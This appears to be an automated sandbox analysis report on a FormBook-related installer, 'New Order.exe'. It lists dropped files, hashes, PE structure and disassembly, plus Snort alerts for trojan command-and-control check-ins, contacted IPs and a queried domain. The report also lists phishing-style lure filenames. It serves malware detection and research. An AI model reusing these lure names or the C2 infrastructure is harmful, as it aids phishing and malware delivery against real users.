                                                                  • 43.229.153.157
                                                                  IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                                  • 192.155.181.250
                                                                  Hxkidwv66m.exeGet hashmaliciousBrowse
                                                                  • 165.3.96.229
                                                                  quote20210126.exe.exeGet hashmaliciousBrowse
                                                                  • 192.155.181.96
                                                                  hwtVPZ3Oeh.exeGet hashmaliciousBrowse
                                                                  • 45.119.117.102
                                                                  wGIJWTsyOY.exeGet hashmaliciousBrowse
                                                                  • 45.119.117.102
                                                                  45z7cFhwjOBd.exeGet hashmaliciousBrowse
                                                                  • 43.229.153.56

JA3 Fingerprints

No context

Dropped Files

Match: C:\Users\user\AppData\Local\Temp\nssD6D3.tmp\System.dll

Associated Sample Name / URL                             Detection
hesaphareketi-0.exe                                      malicious
0FKzNO1g3P.exe                                           malicious
mlzHNUHkUl.exe                                           malicious
Ejima.exe                                                malicious
UrgentNewOrder_pdf.exe                                   malicious
Swift 001.exe                                            malicious
DHL DOCUMENTS.exe                                        malicious
DHL Shipment Documents.exe                               malicious
20210622-kll98374.exe                                    malicious
SKMTC_STOMANAS_7464734648592848Ordengdoc.exe             malicious
Orden de compra.exe                                      malicious
Pending delivery - Final Attempt.exe                     malicious
2bni49vTpt.exe                                           malicious
rJIeeo2B7Q.exe                                           malicious
e-hesap bildirimi.exe                                    malicious
Draft Booking Confirmation 062120297466471346.exe        malicious
HalkbankEkstre0609202138711233847204.exe                 malicious
232.exe                                                  malicious
Yeni Siparis.exe                                         malicious
Dhl.exe                                                  malicious

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nssD6D3.tmp\System.dll
Process: C:\Users\user\Desktop\New Order.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 10752
Entropy (8bit): 5.7425597599083344
Encrypted: false
SSDEEP: 192:uv+cJZE61KRWJQO6tFiUdK7ckK4k7l1XRBm0w+NiHi1GSJ:uf6rtFRduQ1W+fG8
MD5: 56A321BD011112EC5D8A32B2F6FD3231
SHA1: DF20E3A35A1636DE64DF5290AE5E4E7572447F78
SHA-256: BB6DF93369B498EAA638B0BCDC4BB89F45E9B02CA12D28BCEDF4629EA7F5E0F1
SHA-512: 5354890CBC53CE51081A78C64BA9C4C8C4DC9E01141798C1E916E19C5776DAC7C82989FAD0F08C73E81AABA332DAD81205F90D0663119AF45550B97B338B9CC3
Malicious: false
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: hesaphareketi-0.exe, Detection: malicious
• Filename: 0FKzNO1g3P.exe, Detection: malicious
• Filename: mlzHNUHkUl.exe, Detection: malicious
• Filename: Ejima.exe, Detection: malicious
• Filename: UrgentNewOrder_pdf.exe, Detection: malicious
• Filename: Swift 001.exe, Detection: malicious
• Filename: DHL DOCUMENTS.exe, Detection: malicious
• Filename: DHL Shipment Documents.exe, Detection: malicious
• Filename: 20210622-kll98374.exe, Detection: malicious
• Filename: SKMTC_STOMANAS_7464734648592848Ordengdoc.exe, Detection: malicious
• Filename: Orden de compra.exe, Detection: malicious
• Filename: Pending delivery - Final Attempt.exe, Detection: malicious
• Filename: 2bni49vTpt.exe, Detection: malicious
• Filename: rJIeeo2B7Q.exe, Detection: malicious
• Filename: e-hesap bildirimi.exe, Detection: malicious
• Filename: Draft Booking Confirmation 062120297466471346.exe, Detection: malicious
• Filename: HalkbankEkstre0609202138711233847204.exe, Detection: malicious
• Filename: 232.exe, Detection: malicious
• Filename: Yeni Siparis.exe, Detection: malicious
• Filename: Dhl.exe, Detection: malicious
Reputation: moderate, very likely benign file
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j....l.9..i....l.Richm.........................PE..L...X:.V...........!.................).......0...............................`......................................p2......t0..P............................P.......................................................0..X............................text............................... ..`.rdata.......0......."..............@..@.data...d....@.......&..............@....reloc.......P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\vsfjb
Process: C:\Users\user\Desktop\New Order.exe
File Type: DOS executable (COM)
Category: dropped
Size (bytes): 57926
Entropy (8bit): 5.249711236819549
Encrypted: false
SSDEEP: 1536:4sNQIgtk+T65l6IYdl7yUB/Bt8jIxTmTOQGpl/o36VB:4sNQIyk+e5wIY2UpBt8MsOp9o3eB
MD5: 681D07B1855C5A576FAC300525AEF5E5
SHA1: AECB2FE8FD71ABA75DEC992F514E51CBD72AA282
SHA-256: 8301B3229F2779C0C4009D650FD60C913F74A8CE80225D2530B1E5B0674767A3
SHA-512: DE6DE30255D840208D8649FA4AE6C7EE629EC7CEE7787FFC090CA2BF1F3E4DA4F61095AABF50FB1EDB0B088416A1E5BDD3F27C31C763A61C284095252B452D36
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 2%
Reputation: low
Preview: .....U..X........S..........e...............E.;.E.-.E...E.r.E.s.e..PS......;....+.....+..................5.........z.........J.......q+...-....+....................0.........+.3...Y..H......+.-....+._.......E...C3....J....#....g.....*........;..S+....+.._................j.t....0........-....3...O...+..........m..j.,.....+.+..............3...+.+....\..........B....}.....i+.3..63..n.......X+.+.3.....-......-.................+...q+.3..Z-......w........2.......;........3........ ........3.+.5....5......X[PS......;....+.....+..................5.........z.........J.......q+...-....+....................0.........+.3...Y..H......+.-....+._.......E...C3....J....#....g.....*........;..S+....+.._................j.t....0........-....3...O...+..........m..j.,.....+.+..............3...+.+....\..........B....}.....i+.3..63..n.......X+.+.3.....-......-.................+...q+.3..Z-......w........2.......;........3........ ........3.+.5....5...

C:\Users\user\AppData\Local\Temp\zonlh1a303n85
Process: C:\Users\user\Desktop\New Order.exe
File Type: data
Category: dropped
Size (bytes): 164351
Entropy (8bit): 7.98936475093836
Encrypted: false
SSDEEP: 3072:EjxwKBZggdPTnGp3xLmsGmEe1LE1tJbHCnNUn3j04AXk2WrcnsgL4:2xwAd7GdxLdGmEeivJ1Q42wcsgL4
MD5: D4BB6C3B11E85EEEA93B6461993B1561
SHA1: 69EDCDA9E995067C333C55036414FD4961C1F3A1
SHA-256: 0DF21A068840119834EDECA99F658F4582341D6295A26B0F8F03387A03F82402
SHA-512: 6B08C217B3FC83608A850263CE6C7912E466ED443809163385E43EFF20341CF3180624FBEB0B417C51DCEC97E07899B6239BA8EC2D904C086FCE5068AF1FCBF3
Malicious: false
Reputation: low
Preview: ........&....3...Z..,N.;iUS.M...d.W.g.a......LG.%)N.....v.W.it...W....pBQ-+...=.`......V ~..7...........R......"up..I...&.C..............<..._.J...d)9.........J.?../.dUr..p...J....(o....#{.b......-O...W.].G?.....c...j.]......p..s...PGtk...H............l.z.....%......d.W.#g.a...#..LG.%)N.....vfW.i.....Q.....u..WI......-'...."T...%^ e....,V......7.dC..r"up..I{.../2g..z...V....j.p.S...hx0lg._;.f.#<..Zr}Q...@..dU..Wp.lJJ...(-....#{.bd.^.l..`.S..W.].G.yh..%c..h..].>..4.p.'s.Q..PGtk.........$..;..l.z.7.WT%.Y..=...d.W.g.a......LG.%)N.....vfW.i.....Q.....u..WI......-'...."T...%^ e....,V......7.dC..r"up..I{.../2g..z...V....j.p.S...hx0lg._;.f.#<..Zr}Q?../.dU...p..JJ..>.(o....#{.bd.^.l.-`...W.].G.yh..%c..h..].>..4.p.'s.Q..PGtk.........$..;..l.z.7.WT%.Y..=...d.W.g.a......LG.%)N.....vfW.i.....Q.....u..WI......-'...."T...%^ e....,V......7.dC..r"up..I{.../2g..z...V....j.p.S...hx0lg._;.f.#<..Zr}Q?../.dU...p..JJ..>.(o....#{.bd.^.l.-`...W.].G.yh..%c.

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit): 7.882875340417013
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: New Order.exe
File size: 206093
MD5: 4af03301316c984c17ca822456b6d918
SHA1: ad237296e61bde6fe8ba894ec7445bb9bc76ab69
SHA256: ac339f7ecac47cfc3a860ad42986d9f8d68208e7c7df8b21d4640ade4f2b5131
SHA512: 01988b176dfb0851fb9958c3948dbd2c434d0706b120f0609eecf157619bcd27f16741951d93fa4a236524f4f9cb46f171a9b4acf39b70fac26514eee8248f94
SSDEEP: 3072:QBynOpL12riocMMV6iTl2vFxqr91H9KANIlQoxOPTZEDHjMmRqZiOewWE:QBlL/Vd5yqB1HMVlJxOPODjMmEiOewX
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

File Icon

Icon Hash: b2a88c96b2ca6a72

Static PE Info

General

Entrypoint: 0x4030fb
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
TLS Callbacks: none
CLR (.Net) Version: none
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: b76363e9cb88bf9390860da8e50999d2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push ebp
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+20h], ebx
mov dword ptr [esp+14h], 00409168h
mov dword ptr [esp+1Ch], ebx
mov byte ptr [esp+18h], 00000020h
call dword ptr [004070B0h]
call dword ptr [004070ACh]
cmp ax, 00000006h
je 00007FA4A0C34A63h
push ebx
call 00007FA4A0C37844h
cmp eax, ebx
je 00007FA4A0C34A59h
push 00000C00h
call eax
mov esi, 00407280h
push esi
call 00007FA4A0C377C0h
push esi
call dword ptr [00407108h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FA4A0C34A3Dh
push 0000000Dh
call 00007FA4A0C37818h
push 0000000Bh
call 00007FA4A0C37811h
mov dword ptr [00423F44h], eax
                                                                                                          call dword ptr [00407038h]
                                                                                                          push ebx
                                                                                                          call dword ptr [0040726Ch]
                                                                                                          mov dword ptr [00423FF8h], eax
                                                                                                          push ebx
                                                                                                          lea eax, dword ptr [esp+38h]
                                                                                                          push 00000160h
                                                                                                          push eax
                                                                                                          push ebx
                                                                                                          push 0041F4F0h
                                                                                                          call dword ptr [0040715Ch]
                                                                                                          push 0040915Ch
                                                                                                          push 00423740h
                                                                                                          call 00007FA4A0C37444h
                                                                                                          call dword ptr [0040710Ch]
                                                                                                          mov ebp, 0042A000h
                                                                                                          push eax
                                                                                                          push ebp
                                                                                                          call 00007FA4A0C37432h
                                                                                                          push ebx
                                                                                                          call dword ptr [00407144h]

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x7418           0xa0          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2d000          0xc68         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x7000           0x27c         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x5aeb        0x5c00    False     0.665123980978   data       6.42230569414  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x7000           0x1196        0x1200    False     0.458984375      data       5.20291736659  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x9000           0x1b038       0x600     False     0.432291666667   data       4.0475118296   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata  0x25000          0x8000        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x2d000          0xc68         0xe00     False     0.405412946429   data       3.97774713785  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name           RVA      Size   Type                                                                        Language  Country
RT_ICON        0x2d1d8  0x2e8  data                                                                        English   United States
RT_DIALOG      0x2d4c0  0x100  data                                                                        English   United States
RT_DIALOG      0x2d5c0  0x11c  data                                                                        English   United States
RT_DIALOG      0x2d6e0  0x60   data                                                                        English   United States
RT_GROUP_ICON  0x2d740  0x14   data                                                                        English   United States
RT_VERSION     0x2d758  0x240  data
RT_MANIFEST    0x2d998  0x2cc  XML 1.0 document, ASCII text, with very long lines, with no line terminators  English   United States

Imports

DLL           Import
KERNEL32.dll  GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
USER32.dll    SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
GDI32.dll     SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll   SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
ADVAPI32.dll  RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll  ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll     OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Version Infos

Description      Data
LegalCopyright   tenants
FileVersion      8.0.7.4
CompanyName      amply
LegalTrademarks  lieutenant
Comments         sims
ProductName      mediator
FileDescription  powering
Translation      0x0000 0x04e4

Possible Origin

Language of compilation system  Country where language is spoken  Map
English                         United States

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                             Source Port  Dest Port  Source IP       Dest IP
06/22/21-18:05:57.232848  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)                49765        80         192.168.2.4     34.102.136.180
06/22/21-18:05:57.232848  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)                49765        80         192.168.2.4     34.102.136.180
06/22/21-18:05:57.232848  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)                49765        80         192.168.2.4     34.102.136.180
06/22/21-18:05:57.373182  TCP       1201     ATTACK-RESPONSES 403 Forbidden                      80           49765      34.102.136.180  192.168.2.4
06/22/21-18:06:46.522727  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)                49778        80         192.168.2.4     35.209.88.35
06/22/21-18:06:46.522727  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)                49778        80         192.168.2.4     35.209.88.35
06/22/21-18:06:46.522727  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)                49778        80         192.168.2.4     35.209.88.35
06/22/21-18:06:47.354678  ICMP      402      ICMP Destination Unreachable Port Unreachable                                192.168.2.4     8.8.8.8
06/22/21-18:06:51.976615  TCP       1201     ATTACK-RESPONSES 403 Forbidden                      80           49779      34.102.136.180  192.168.2.4
06/22/21-18:06:57.245840  TCP       1201     ATTACK-RESPONSES 403 Forbidden                      80           49780      34.102.136.180  192.168.2.4
06/22/21-18:07:02.503415  TCP       1201     ATTACK-RESPONSES 403 Forbidden                      80           49781      34.102.136.180  192.168.2.4

Network Port Distribution

TCP Packets
                                                                                                          Jun 22, 2021 18:06:51.793962002 CEST4977980192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:06:51.837032080 CEST804977934.102.136.180192.168.2.4
                                                                                                          Jun 22, 2021 18:06:51.837265015 CEST4977980192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:06:51.837527990 CEST4977980192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:06:51.880568027 CEST804977934.102.136.180192.168.2.4
                                                                                                          Jun 22, 2021 18:06:51.976614952 CEST804977934.102.136.180192.168.2.4
                                                                                                          Jun 22, 2021 18:06:51.976666927 CEST804977934.102.136.180192.168.2.4
                                                                                                          Jun 22, 2021 18:06:51.976871967 CEST4977980192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:06:51.976931095 CEST4977980192.168.2.434.102.136.180
                                                                                                          Jun 22, 2021 18:06:52.020415068 CEST804977934.102.136.180192.168.2.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 22, 2021 18:04:51.640705109 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:04:52.553347111 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:04:52.606376886 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:04:53.506577015 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:04:53.565637112 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:04:55.021409988 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:04:55.080760002 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:04:56.199162006 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:04:56.258557081 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:04:57.458127975 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:04:57.508827925 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:04:58.353847027 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:04:58.404939890 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:04:59.418277025 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:04:59.474721909 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:00.341372013 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:00.397557974 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:01.455554008 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:01.505968094 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:02.371608019 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:02.425209999 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:03.662364006 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:03.714626074 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:04.825570107 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:04.878463984 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:07.260529995 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:07.311386108 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:08.398658037 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:08.458273888 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:09.705202103 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:09.755305052 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:10.919406891 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:10.975267887 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:11.858045101 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:11.927227974 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:13.032439947 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:13.091696024 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:15.475276947 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:15.528253078 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:21.818195105 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:21.894490957 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:39.818063021 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:40.033080101 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:40.850999117 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:40.912467003 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:41.527678013 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:41.769505978 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:42.216876030 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:42.284393072 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:42.697580099 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:42.767492056 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:42.921756029 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:42.983896017 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:43.520226002 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:43.582356930 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:44.099085093 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:44.161602020 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:45.026206017 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:45.086499929 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:46.051551104 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:46.110084057 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:46.622945070 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:46.688252926 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:46.922976971 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:46.975034952 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:57.109780073 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:57.184031963 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:05:58.313008070 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:05:58.376924038 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:06:02.382002115 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:06:02.443214893 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:06:25.780879021 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:06:25.839808941 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:06:28.525279045 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:06:28.711617947 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:06:29.494532108 CEST | 64206 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:06:29.569048882 CEST | 53 | 64206 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:06:31.182023048 CEST | 50904 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:06:31.248929977 CEST | 53 | 50904 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:06:34.154006004 CEST | 57525 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:06:34.230094910 CEST | 53 | 57525 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:06:39.529205084 CEST | 53814 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:06:39.600775003 CEST | 53 | 53814 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:06:45.072633028 CEST | 53418 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:06:46.067790985 CEST | 53418 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:06:46.367737055 CEST | 53 | 53418 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:06:47.354382992 CEST | 53 | 53418 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:06:51.717861891 CEST | 62833 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:06:51.792109966 CEST | 53 | 62833 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:06:56.999191999 CEST | 59260 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:06:57.062167883 CEST | 53 | 59260 | 8.8.8.8 | 192.168.2.4
Jun 22, 2021 18:07:02.257379055 CEST | 49944 | 53 | 192.168.2.4 | 8.8.8.8
Jun 22, 2021 18:07:02.320333958 CEST | 53 | 49944 | 8.8.8.8 | 192.168.2.4

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jun 22, 2021 18:06:47.354677916 CEST | 192.168.2.4 | 8.8.8.8 | d00f | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 22, 2021 18:05:57.109780073 CEST | 192.168.2.4 | 8.8.8.8 | 0xe467 | Standard query (0) | www.collectordrive.com | A (IP address) | IN (0x0001)
